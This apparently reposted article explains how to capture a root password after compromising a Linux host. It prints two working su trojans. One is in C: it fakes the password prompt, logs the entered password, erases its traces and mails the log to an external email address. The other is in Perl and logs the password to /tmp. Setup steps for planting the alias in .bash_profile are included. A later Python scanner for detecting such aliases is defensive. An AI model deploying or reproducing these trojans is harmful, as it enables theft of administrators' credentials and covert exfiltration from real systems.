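When the web backdoor itself runs as root (which is vanishingly unlikely), or after some vulnerability has been exploited successfully to gain the highest privileges, being able to obtain the root password brings us many benefits. I looked up the methods used by those who came before: one is to spoof su so that it records the password, and the other is to replace sshd. Let's look at the code for spoofing su to record the password first.
First, the first method: kpr-fakesu.c V0.9beta167 (fucksu.c)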
```c
/*
 * kpr-fakesu.c V0.9beta167 ;P
 * by koper <koper@linuxmail.org>
 *
 * Setting up:
 * admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c
 * admin@host:~$ mv .su /var/tmp/.su
 * admin@host:~$ cp .bash_profile .wgetrc
 * admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile
 * admin@host:~$ logout
 * *** LOGIN ***
 * admin@host:~$ su
 * Password:
 * su: Authentication failure
 * Sorry.
 * admin@host:~$ su
 * Password:
 * root@host:~# logout
 * admin@host:~$ cat /var/tmp/.pwds
 * root:dupcia17
 * admin@host:~$
 *
 * /bin/su sends various failure information depending on the OS ver.
 * Please modify the source to make it "fit"
 *
 */
#include <stdio.h>
#include <stdlib.h>

main(int argc, char *argv[]){
    FILE *fp;
    char *user;
    char *pass;
    char filex[100];
    char clean[100];

    sprintf(filex,"/var/tmp/.pwds");
    sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/admin/.wgetrc /home/admin/.bash_profile");
    if(argc==1) user="root";
    if(argc==2) user=argv[1];
    if(argc>2){
        if(strcmp(argv[1], "-l")==0)
            user=argv[2];
        else
            user=argv[1];
    }

    fprintf(stdout,"Password: ");
    pass=getpass ("");
    system("sleep 3");
    fprintf(stdout,"su: Authentication failure\nSorry.\n");

    if ((fp=fopen(filex,"w")) != NULL) {
        fprintf(fp, "%s:%s\n", user, pass);
        fclose(fp);
    }

    system(clean);
    system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");

    /* If you don't want password in your e-mail uncomment this line: */
    system("uname -a >> /var/tmp/.pwds; cat /var/tmp/.pwds | mail kalikosta@hotmail.com ");
}
```
Perl version:

```perl
#!/usr/bin/perl
####################################################################################################
# kyle@freeshell.se 2006 su trojan check so the su path is correct.                               #
# then make alias for trojan first it reads the pass then exec the real su.                       #
# logging to /tmp/.pass                                                                           #
####################################################################################################
print "Password: ";
$s1=<STDIN>;
print "Sorry.\n";
$s2="Password is: ";
$s3=`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ("Could not open file. $!");
print users ($s2, $s1,$s3);
close (users);
system("/bin/su")
```
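Both programs above only work once an `alias su=...` line has been planted in the user's shell start-up file, which is also where the technique is easiest to detect. The following Python scanner is an added example, not part of the original article: it reads profile text and reports aliases or shell functions that redirect a credential-prompting command to a file outside the system directories. The command list, the trusted directories, the function names and the sample profile are assumptions made for illustration.

```python
import posixpath
import re
import shlex

SENSITIVE = {"su", "sudo", "ssh", "passwd"}  # credential-prompting commands (assumed list)
TRUSTED_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")  # assumption, distro-dependent
FUNC_RE = re.compile(r"^\s*(?:function\s+)?([\w.-]+)\s*\(\s*\)(.*)$")

# Constructed sample of a tampered ~/.bash_profile (not taken from a real host).
SAMPLE = """alias ll='ls -l'
alias su='su -'
alias su=/var/tmp/.su
sudo() { /usr/bin/perl /tmp/.x.pl "$@"; }
alias ssh=/bin/../home/admin/.ssh-wrap
"""


def _severity(name, body):
    """Rate a redefinition of `name` whose replacement command line is `body`."""
    words = body.replace(";", " ").split()
    paths = [posixpath.normpath(w) for w in words if w.startswith("/")]
    if any(not (p + "/").startswith(TRUSTED_DIRS) for p in paths):
        return "high"    # runs a file from outside the system directories
    first = next((w for w in words if w not in ("{", "}")), "")
    if posixpath.basename(first) == name:
        return None      # benign wrapper, e.g. alias su='su -' or alias su=/bin/su
    return "review"      # resolved through PATH, or body continues on later lines


def scan_profile(text, source="<profile>"):
    """Return (source, line, command, severity) for each suspicious redefinition."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:           # unbalanced quote: fall back to a plain split
            tokens = line.split()
        func = FUNC_RE.match(line)
        if tokens and tokens[0] == "alias":
            defs = [t.partition("=")[::2] for t in tokens[1:] if "=" in t]
        else:
            defs = [func.groups()] if func else []
        for name, body in defs:
            if name in SENSITIVE and (sev := _severity(name, body)):
                findings.append((source, lineno, name, sev))
    return findings

if __name__ == "__main__":
    print(scan_profile(SAMPLE, "~/.bash_profile"))
```

Run it over every start-up file a login shell reads (`.bash_profile`, `.bashrc`, `.profile`, `/etc/profile.d/*`) and treat any `high` finding on an account that can reach root as a reason to rotate that password.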
The other method: replacing sshd
This article is reposted from LINUXSO